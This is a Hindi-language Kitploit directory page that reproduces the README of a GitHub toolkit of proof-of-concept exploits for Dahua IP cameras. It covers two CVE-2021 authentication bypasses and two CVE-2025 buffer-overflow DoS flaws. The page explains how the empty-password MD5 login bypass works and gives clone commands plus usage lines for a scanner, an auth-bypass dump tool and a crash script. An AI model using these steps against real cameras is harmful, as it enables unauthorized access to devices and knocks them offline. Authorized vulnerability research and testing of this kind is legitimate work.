Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
dahua-cve-research — Dahua IP कैमरा CVE अनुसंधान टूलकिट (CVE-2021-33044/33045, CVE-2025-31700/31701) | Kitploit
उपकरण/GitHubGitHub/umair-aziz025/dahua-cve-research
IoT सुरक्षानेटवर्क मैपिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubumair-aziz025/dahua-cve-research

dahua-cve-research

Dahua IP कैमरा CVE अनुसंधान टूलकिट (CVE-2021-33044/33045, CVE-2025-31700/31701)

रिपॉजिटरी देखें
2164 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

डाहुआ आईपी कैमरा CVE एक्सप्लॉइट टूल्स

⚠️ विकासाधीन — ये स्क्रिप्ट्स प्रकाशित CVE विवरणों पर आधारित हैं और पूर्ण कार्यक्षमता की पुष्टि के लिए कमजोर उपकरणों के विरुद्ध आगे परीक्षण की आवश्यकता है।

चार गंभीर डाहुआ आईपी कैमरा कमजोरियों के लिए शोध और proof-of-concept स्क्रिप्ट्स।


⚠️ कानूनी अस्वीकरण

root@kitploit:~
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

By using these tools, you agree that:
  1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
  2. You will NOT use these tools for illegal activities
  3. You accept full responsibility for your actions
  4. The authors are NOT liable for any misuse or damage

Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.

शामिल CVE

CVECVSSप्रकारस्थिति
CVE-2021-330449.8 CRITICALप्रमाणीकरण बायपासCISA KEV (सक्रिय रूप से शोषित)
CVE-2021-330459.8 CRITICALप्रमाणीकरण बायपासCISA KEV (सक्रिय रूप से शोषित)
CVE-2025-317008.1 HIGHबफर ओवरफ्लो DoSहालिया (2025)
CVE-2025-317018.1 HIGHबफर ओवरफ्लो DoSहालिया (2025)

CVE-2021-33044 और CVE-2021-33045 — प्रमाणीकरण बायपास

  • CVSS: 9.8 गंभीर
  • CWE: CWE-287 (अनुचित प्रमाणीकरण)
  • तंत्र: RPC2 लॉगिन खाली-पासवर्ड हैश स्वीकार करता है, जो व्यवस्थापक पहुंच प्रदान करता है
  • प्रभावित: IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-, VTO-, VTH-, NVR-, XVR-*
  • इसमें ठीक किया गया: फर्मवेयर 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
  • संदर्भ:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • CISA KEV कैटलॉग

CVE-2025-31700 और CVE-2025-31701 — बफर ओवरफ्लो (DoS/RCE)

  • CVSS: 8.1 उच्च
  • CWE: CWE-120 (इनपुट के आकार की जांच किए बिना बफर कॉपी)
  • तंत्र: अत्यधिक बड़े पैकेट बफर ओवरफ्लो उत्पन्न करते हैं → क्रैश या संभावित RCE
  • संदर्भ:
    • NVD CVE-2025-31700
    • डाहुआ सुरक्षा परामर्श

प्रमाणीकरण बायपास कैसे काम करता है

डाहुआ कैमरे /RPC2_Login पर challenge-response प्रमाणीकरण का उपयोग करते हैं:

root@kitploit:~
Normal Login:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

Bypass (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← EMPTY password
  step2 = MD5("step1:random:step1")

कमजोर फर्मवेयर खाली-पासवर्ड हैश स्वीकार करता है और एक वैध सत्र टोकन लौटाता है।


स्क्रिप्ट्स


स्थापना

root@kitploit:~
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# Install dependencies
pip install requests

उपयोग

नेटवर्क स्कैनर

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# Single host with port
python dahua_scanner.py 192.168.1.100:8081

# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# Show help
python dahua_scanner.py --help

सामान्य डाहुआ पोर्ट: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777

मल्टी-CVE एक्सप्लॉइट (अनुशंसित)

root@kitploit:~
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # Single CVE
python dahua_exploit.py --help

प्रमाणीकरण बायपास

root@kitploit:~
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # Dump device info after bypass

बफर ओवरफ्लो DoS

root@kitploit:~
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp   # TCP/37777 only

⚠️ चेतावनी: DoS स्क्रिप्ट लक्षित डिवाइस को क्रैश कर सकती है।


निर्भरताएँ

root@kitploit:~
requests

अन्य सभी इम्पोर्ट Python मानक पुस्तकालय से हैं: socket, struct, hashlib, threading, ipaddress, argparse, json


विकास स्थिति

🚧 सक्रिय विकासाधीन

ये स्क्रिप्ट्स निम्न के आधार पर विकसित की गई हैं:

  • NVD से प्रकाशित CVE विवरण
  • डाहुआ सुरक्षा परामर्श
  • सार्वजनिक PoC संदर्भ (seclists.org, packetstormsecurity)

परीक्षण स्थिति:

  • ✅ CVE विनिर्देशों के अनुसार प्रमाणीकरण बायपास तर्क लागू किया गया
  • ✅ परामर्शों के अनुसार बफर ओवरफ्लो पेलोड निर्मित किए गए
  • ⚠️ लाइव कमजोर उपकरणों के विरुद्ध सीमित परीक्षण
  • ⚠️ विविध फर्मवेयर संस्करणों के विरुद्ध अतिरिक्त सत्यापन आवश्यक

यदि आपके पास परीक्षण के लिए कमजोर उपकरणों तक पहुंच है, तो योगदान और प्रतिक्रिया का स्वागत है।


योगदान

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं
  3. अपने परिवर्तनों का परीक्षण करें
  4. एक पुल रिक्वेस्ट सबमिट करें

कृपया किसी भी समस्या या गलत सकारात्मक की रिपोर्ट करें।


संदर्भ

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • CISA ज्ञात शोषित कमजोरियाँ
  • डाहुआ सुरक्षा केंद्र
  • Bashis PoC - Seclists

लाइसेंस

MIT लाइसेंस - LICENSE फ़ाइल देखें।


लेखक

Umair Aziz
GitHub: @umair-aziz025


केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए।

टूल डाउनलोड करें
फ़ाइलउद्देश्यCVEs
dahua_scanner.pyनेटवर्क खोज — सबनेट पर डाहुआ कैमरे खोजेंपहचान
dahua_exploit.pyमल्टी-CVE स्कैनर — सभी कमजोरियों का परीक्षणसभी
dahua_auth_bypass.py--dump विकल्प के साथ समर्पित प्रमाणीकरण बायपासCVE-2021-33044/45
dahua_rce.pyबफर ओवरफ्लो DoS प्रोबCVE-2025-31700/01